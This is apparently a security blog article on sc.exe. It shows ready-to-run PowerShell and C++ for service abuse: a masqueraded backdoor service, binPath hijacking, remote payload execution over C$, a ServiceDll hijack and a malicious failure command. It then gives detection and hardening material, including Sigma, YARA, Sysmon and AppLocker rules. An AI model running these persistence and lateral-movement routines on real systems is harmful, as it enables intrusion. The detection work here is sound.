In Windows system administration, services are a core part of the operating system.
sc.exe (Service Control) is the built-in command-line front end to the Service Control Manager and provides comprehensive service management. That same legitimate system tool is also frequently abused by attackers for persistence, privilege escalation and lateral movement.
Today we will look at the various ways sc.exe is used, and at how to detect and defend against the related malicious behaviour.
The tool lives at `C:\Windows\System32\sc.exe`.

The normal management functions of sc.exe include the following. Note the sc.exe syntax: every option is written as `key= value`, with a space after the equals sign.

```cmd
:: Query services
sc query
sc query type= service
sc query state= all
sc queryex servicename

:: Create services
sc create MyService binPath= "C:\Path\To\Service.exe"
sc create MyService binPath= "C:\Path\To\Service.exe" start= auto
sc create MyService binPath= "cmd.exe /k C:\evil.exe" type= own type= interact

:: Change configuration
sc config MyService start= auto
sc config MyService binPath= "C:\NewPath\NewService.exe"
sc config MyService obj= ".\LocalSystem" password= ""

:: Control and delete
sc start MyService
sc stop MyService
sc pause MyService
sc continue MyService
sc delete MyService
```
Attackers can create a malicious service to maintain persistent access.

```powershell
function Create-BackdoorService {
    param(
        [string]$ServiceName = "WindowsUpdate",
        [string]$BinaryPath = "C:\Windows\Temp\backdoor.exe",
        [string]$DisplayName = "Windows Update Service"
    )
    $result = sc.exe create $ServiceName binPath= $BinaryPath DisplayName= $DisplayName start= auto
    if ($LASTEXITCODE -eq 0) {
        sc.exe description $ServiceName "Provides Windows Update functionality"
        sc.exe start $ServiceName
        return $true
    }
    return $false
}
```

Key points of this technique:

- Service name masquerading: the service name, display name and description imitate a legitimate Windows component (here Windows Update).
- Auto-start setting: `start= auto` ensures the service is started again after every reboot.
- Permission configuration: the account the service runs under (LocalSystem when no `obj=` is given) determines the rights the payload gets.
Executing malicious code by modifying an existing service's binary path.

```powershell
function Exploit-ServicePermission {
    param(
        [string]$TargetService,
        [string]$PayloadPath
    )
    $originalPath = (sc.exe qc $TargetService | Select-String "BINARY_PATH_NAME").ToString().Split(":")[1].Trim()
    sc.exe config $TargetService binPath= $PayloadPath
    sc.exe stop $TargetService
    Start-Sleep -Seconds 2
    sc.exe start $TargetService
    Start-Sleep -Seconds 5
    sc.exe config $TargetService binPath= $originalPath
}
```

Key points of this technique:

- Service permission check: it only works on services whose configuration the attacker is allowed to change.
- Path hijacking: `binPath=` is pointed at the payload, so the Service Control Manager launches it on the next start.
- Timing control: the service is stopped, restarted to run the payload, and the original path is restored after a short delay.
Creating and running a service on a remote system with sc.exe.

```powershell
function Invoke-RemoteService {
    param(
        [string]$TargetHost,
        [string]$ServiceName = "TempService",
        [string]$Command
    )
    $remotePath = "\\$TargetHost\C$\Windows\Temp\payload.exe"
    Copy-Item "C:\local\payload.exe" -Destination $remotePath -Force
    sc.exe \\$TargetHost create $ServiceName binPath= "C:\Windows\Temp\payload.exe"
    sc.exe \\$TargetHost start $ServiceName
    Start-Sleep -Seconds 10
    sc.exe \\$TargetHost stop $ServiceName
    sc.exe \\$TargetHost delete $ServiceName
    Remove-Item $remotePath -Force
}
```

Key points of this technique:

- Remote connection: the `\\computername` syntax makes sc.exe talk to the remote system's Service Control Manager.
- File transfer: the payload is copied over the administrative C$ share beforehand.
- Cleanup: the service is stopped and deleted and the file removed afterwards.
Creating a service that loads a malicious DLL.

```cpp
#include <windows.h>
#include <stdlib.h>   // system()

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
    switch (fdwReason) {
    case DLL_PROCESS_ATTACH:
        // Runs as soon as the hosting svchost.exe loads the DLL
        system("cmd.exe /c echo Hijacked > C:\\temp\\proof.txt");
        break;
    }
    return TRUE;
}

// Entry point svchost.exe looks for in a ServiceDll
extern "C" __declspec(dllexport) VOID WINAPI ServiceMain(DWORD dwArgc, LPTSTR *lpszArgv) {
    // Service main function
}
```

The service is registered as an svchost-hosted service and the DLL is pointed to via the `ServiceDll` value under its `Parameters` key:

```cmd
sc create MaliciousService binPath= "C:\Windows\System32\svchost.exe -k MyGroup"
reg add "HKLM\SYSTEM\CurrentControlSet\Services\MaliciousService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\evil.dll"
```
Configuring a command to run when the service fails.

```cmd
sc failure MyService reset= 0 actions= restart/0/restart/0/run/1000 command= "C:\Windows\System32\cmd.exe /c C:\evil.bat"
```

```powershell
function Set-ServiceFailureAction {
    param(
        [string]$ServiceName,
        [string]$Command
    )
    $actions = "restart/60000/restart/60000/run/60000"
    sc.exe failure $ServiceName reset= 86400 actions= $actions command= $Command
    sc.exe stop $ServiceName
}
```
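All three variants above leave traces in the service's registry key: a suspicious `ImagePath`, a `ServiceDll` outside System32 or without a valid signature, and a `FailureCommand` value. The following added example (not code from the original post) walks `HKLM\SYSTEM\CurrentControlSet\Services` and reports each of them; it needs only read access to the registry, and the path pattern is an assumed heuristic.

```powershell
function Get-ServiceRegistryFindings {
    param([string]$ServicesKey = 'HKLM:\SYSTEM\CurrentControlSet\Services')

    # Locations and interpreters a legitimate service binary rarely lives in or runs through.
    $suspicious = '\\Temp\\|\\Users\\Public\\|\\AppData\\|cmd\.exe|powershell|rundll32|regsvr32'

    foreach ($key in Get-ChildItem -Path $ServicesKey -ErrorAction SilentlyContinue) {
        $name   = $key.PSChildName
        $props  = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
        $params = Get-ItemProperty -Path "$($key.PSPath)\Parameters" -ErrorAction SilentlyContinue

        # Pattern 1: the service binary itself (sc create/config binPath=) is in a user-writable place.
        if ($props.ImagePath -and $props.ImagePath -match $suspicious) {
            [PSCustomObject]@{ Service = $name; Finding = 'SuspiciousImagePath'; Value = $props.ImagePath }
        }

        # Pattern 2: svchost-hosted service whose ServiceDll is outside System32 or not validly signed.
        if ($params.ServiceDll) {
            $dll = [Environment]::ExpandEnvironmentVariables($params.ServiceDll)
            if ($dll -notlike "$env:SystemRoot\System32\*") {
                [PSCustomObject]@{ Service = $name; Finding = 'ServiceDllOutsideSystem32'; Value = $dll }
            }
            # Catalog-signed Windows DLLs report Valid on PowerShell 5+; missing or untrusted files do not.
            if (-not (Test-Path -LiteralPath $dll) -or (Get-AuthenticodeSignature -LiteralPath $dll).Status -ne 'Valid') {
                [PSCustomObject]@{ Service = $name; Finding = 'ServiceDllNotValidlySigned'; Value = $dll }
            }
        }

        # Pattern 3: 'sc failure ... command=' stores FailureCommand; legitimate services almost never set it.
        if ($props.FailureCommand) {
            [PSCustomObject]@{ Service = $name; Finding = 'FailureCommandSet'; Value = $props.FailureCommand }
        }
    }
}

Get-ServiceRegistryFindings | Format-Table -AutoSize
```

Review the `ServiceDllOutsideSystem32` findings against your software inventory before treating them as alerts; third-party services legitimately host DLLs elsewhere, whereas an unsigned DLL or a `FailureCommand` deserves a closer look.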
Event IDs to monitor:

| Event ID | Description | Log |
|---|---|---|
| 7045 | A new service was installed | System |
| 7040 | The start type of a service was changed | System |
| 7036 | A service entered the running/stopped state | System |
| 4697 | A service was installed in the system | Security |
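Event 7045 carries the new service's name, image path, start type and account as structured fields, and it is written by the Service Control Manager of the machine that received the request. It therefore also records services created remotely with `sc \\host create`, where no sc.exe process ever runs on the target and process-creation rules see nothing. The added example below (not code from the original post) parses those fields and flags suspicious image paths; the sample event is constructed, and the path pattern is an assumed heuristic.

```powershell
function ConvertFrom-ServiceInstallEvent {
    param([Parameter(Mandatory)][xml]$EventXml)
    # 7045 carries ServiceName, ImagePath, ServiceType, StartType and AccountName as <Data Name="..."> elements.
    $d = @{}
    foreach ($n in $EventXml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    [PSCustomObject]@{
        ServiceName = $d['ServiceName']
        ImagePath   = $d['ImagePath']
        StartType   = $d['StartType']
        Account     = $d['AccountName']
        Suspicious  = [bool]($d['ImagePath'] -match '\\Temp\\|\\Users\\Public\\|\\AppData\\|cmd\.exe|powershell|rundll32|regsvr32')
    }
}

# Constructed sample event (not a real log record), in the shape that Get-WinEvent's ToXml() returns.
$sample = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Service Control Manager"/><EventID>7045</EventID></System>
  <EventData>
    <Data Name="ServiceName">WindowsUpdate</Data>
    <Data Name="ImagePath">C:\Windows\Temp\backdoor.exe</Data>
    <Data Name="ServiceType">user mode service</Data>
    <Data Name="StartType">auto start</Data>
    <Data Name="AccountName">LocalSystem</Data>
  </EventData>
</Event>
'@
# The image path under \Temp\ marks this constructed install as suspicious.
ConvertFrom-ServiceInstallEvent -EventXml ([xml]$sample)

# Live sweep of the most recent 7045 events on this host.
Get-WinEvent -FilterHashtable @{ LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7045 } `
             -MaxEvents 200 -ErrorAction SilentlyContinue |
    ForEach-Object { ConvertFrom-ServiceInstallEvent -EventXml ([xml]$_.ToXml()) } |
    Where-Object Suspicious | Format-Table -AutoSize
```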
A Sysmon configuration fragment that records sc.exe command lines used to create or modify services, together with writes under the Services registry keys:

```xml
<Sysmon schemaversion="4.22">
  <EventFiltering>
    <RuleGroup name="Service Creation Detection" groupRelation="or">
      <!-- Event ID 1: sc.exe invoked with create, config or failure -->
      <ProcessCreate onmatch="include">
        <Image condition="end with">sc.exe</Image>
        <CommandLine condition="contains any">create;config;failure</CommandLine>
      </ProcessCreate>
      <!-- Event ID 13: a value set under HKLM\SYSTEM\CurrentControlSet\Services -->
      <RegistryEvent onmatch="include">
        <TargetObject condition="contains">\Services\</TargetObject>
        <EventType condition="is">SetValue</EventType>
      </RegistryEvent>
    </RuleGroup>
  </EventFiltering>
</Sysmon>
```
A simple PowerShell loop that polls the service list every 30 seconds, reports services that are new or whose start type changed, and shows the most recent 7045 event alongside:

```powershell
function Monitor-ServiceChanges {
    $baseline = Get-Service | Select-Object Name, DisplayName, Status, StartType
    while ($true) {
        Start-Sleep -Seconds 30
        $current = Get-Service | Select-Object Name, DisplayName, Status, StartType
        # "=>" marks entries present only in the current snapshot (new service or changed property)
        $diff = Compare-Object $baseline $current -Property Name, DisplayName, StartType
        if ($diff) {
            foreach ($change in $diff) {
                if ($change.SideIndicator -eq "=>") {
                    Write-Warning "New or modified service detected: $($change.Name)"
                    $evt = Get-WinEvent -FilterHashtable @{LogName='System'; ID=7045} -MaxEvents 1
                    if ($evt) {
                        Write-Warning "Service details: $($evt.Message)"
                    }
                }
            }
            $baseline = $current
        }
    }
}
```
A Sigma rule over process-creation logs for sc.exe invocations that create a service with a binPath in a user-writable location or through an interpreter:

```yaml
title: Suspicious Service Creation via SC.exe
id: 85b794f7-8d8c-4cbd-a22e-5d3c9c4e3a6d
status: experimental
description: Detects suspicious service creation using sc.exe
references:
    - https://lolbas-project.github.io/
tags:
    - attack.persistence
    - attack.t1543.003
    - attack.privilege_escalation
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith: '\sc.exe'
    selection_cli:
        CommandLine|contains|all:
            - 'create'
            - 'binPath'
    suspicious_paths:
        CommandLine|contains:
            - '\Users\Public\'
            - '\Temp\'
            - '\AppData\'
            - 'cmd.exe'
            - 'powershell'
            - 'regsvr32'
            - 'rundll32'
    condition: selection_img and selection_cli and suspicious_paths
falsepositives:
    - Legitimate software installation
    - System administration activities
level: medium
```
A YARA rule for scripts and batch files that combine sc.exe service creation with interpreters and user-writable paths:

```yara
rule Suspicious_Service_Creation {
    meta:
        description = "Detects suspicious service creation patterns"
        author = "Security Team"
        date = "2024-11-15"
    strings:
        $sc1 = "sc create" nocase
        $sc2 = "sc config" nocase
        $sc3 = "binPath=" nocase
        $susp1 = "cmd.exe /c" nocase
        $susp2 = "powershell.exe" nocase
        $susp3 = "%COMSPEC%" nocase
        $susp4 = "regsvr32" nocase
        $path1 = "\\Temp\\" nocase
        $path2 = "\\Users\\Public\\" nocase
        $path3 = "\\AppData\\" nocase
    condition:
        any of ($sc*) and any of ($susp*) and any of ($path*)
}
```
Restrict who can reconfigure a service by setting its security descriptor with `sc sdset`. The SDDL below gives SYSTEM control of the service, Administrators full control, and leaves Interactive and Service users with query rights only:

```powershell
function Harden-ServicePermissions {
    param([string]$ServiceName)
    # SY: query/start/stop/pause; BA: full control; IU and SU: query and read-control only
    $sdl = "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
    sc.exe sdset $ServiceName $sdl
}
```
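Before hardening it helps to know which services are weak in the first place. The added example below (not code from the original post) parses the SDDL that `sc sdshow` returns and reports ACEs that grant low-privileged principals rights sufficient to take over the service: DC (change configuration, which includes binPath), WD (write DACL), WO (write owner) and the generic GA/GW. The two descriptors it is run on are constructed; the first is the hardened one from above.

```powershell
function Find-WeakServiceAce {
    param([Parameter(Mandatory)][string]$Sddl, [string]$ServiceName = '<sddl>')

    # Principals that every local or domain user falls into (well-known SDDL aliases, plus Domain Users by RID 513).
    $lowPriv  = 'AU', 'WD', 'BU', 'IU', 'AN', 'BG', 'DU'
    # Rights that let the holder change the binary path or rewrite the descriptor itself.
    $takeover = 'DC', 'WD', 'WO', 'GA', 'GW'

    # An allow ACE looks like (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU): type;flags;rights;objguid;inheritguid;sid.
    # Rights are two-letter codes; a raw hex mask (0x...) is not decoded here.
    foreach ($m in [regex]::Matches($Sddl, '\(A;[^;]*;([^;]*);[^;]*;[^;]*;([^)]*)\)')) {
        $rights  = [regex]::Matches($m.Groups[1].Value, '..') | ForEach-Object { $_.Value }
        $sid     = $m.Groups[2].Value
        $granted = $rights | Where-Object { $takeover -contains $_ }
        if (($lowPriv -contains $sid -or $sid -like 'S-1-5-21-*-513') -and $granted) {
            [PSCustomObject]@{ Service = $ServiceName; Principal = $sid; TakeoverRights = ($granted -join ',') }
        }
    }
}

# Constructed descriptors: the hardened one grants Interactive/Service users query rights only,
# while the second lets Authenticated Users change the configuration and rewrite the DACL.
$hardened = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)'
$weak     = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)'
Find-WeakServiceAce -Sddl $hardened -ServiceName 'hardened'
Find-WeakServiceAce -Sddl $weak     -ServiceName 'weak'

# Live sweep of every service on this host; sc sdshow reads the descriptor without admin rights for most services.
foreach ($svc in Get-Service) {
    $out = (sc.exe sdshow $svc.Name) -join ''
    if ($out -match '^D:') { Find-WeakServiceAce -Sddl $out -ServiceName $svc.Name }
}
```

Any service the live sweep reports is a candidate for `Harden-ServicePermissions` above, after checking that the flagged principal does not legitimately need to reconfigure it.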
Enable the audit subcategory that produces Security event 4697 (Security System Extension), plus System Integrity:

```cmd
auditpol /set /subcategory:"Security System Extension" /success:enable /failure:enable
auditpol /set /subcategory:"System Integrity" /success:enable /failure:enable
```
An AppLocker publisher rule that denies executables signed by anyone other than Microsoft:

```xml
<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
    <FilePublisherRule Id="1" Name="Block Unsigned Services" Description="" UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions>
        <FilePublisherCondition PublisherName="*" ProductName="*" BinaryName="*">
          <BinaryVersionRange LowSection="*" HighSection="*" />
        </FilePublisherCondition>
      </Conditions>
      <Exceptions>
        <FilePublisherCondition PublisherName="O=MICROSOFT CORPORATION" ProductName="*" BinaryName="*">
          <BinaryVersionRange LowSection="*" HighSection="*" />
        </FilePublisherCondition>
      </Exceptions>
    </FilePublisherRule>
  </RuleCollection>
</AppLockerPolicy>
```

Note that a publisher rule only matches signed files; an unsigned binary such as the backdoor examples above is covered by AppLocker's default deny for anything no allow rule matches, or by an explicit path or hash rule.
Record a baseline of every service's configuration and binary hash so that later changes can be compared against it:

```powershell
function Create-ServiceBaseline {
    $baseline = foreach ($service in Get-Service) {
        $svc = Get-CimInstance Win32_Service -Filter "Name='$($service.Name)'"
        # PathName may carry quotes and arguments ("C:\Program Files\x\svc.exe" -arg); hash only the executable.
        $exe = if ($svc.PathName -match '^"([^"]+)"|^(\S+)') { $matches[1] + $matches[2] } else { $svc.PathName }
        [PSCustomObject]@{
            Name        = $service.Name
            DisplayName = $service.DisplayName
            Status      = $service.Status
            StartType   = $service.StartType
            PathName    = $svc.PathName
            StartName   = $svc.StartName
            Description = $svc.Description
            Hash        = (Get-FileHash -LiteralPath $exe -ErrorAction SilentlyContinue).Hash
        }
    }
    $baseline | Export-Csv -Path "C:\ServiceBaseline.csv" -NoTypeInformation
}
```
As the built-in Windows service management tool, sc.exe offers powerful functionality, but it has also become a tool attackers commonly rely on. The main threats include: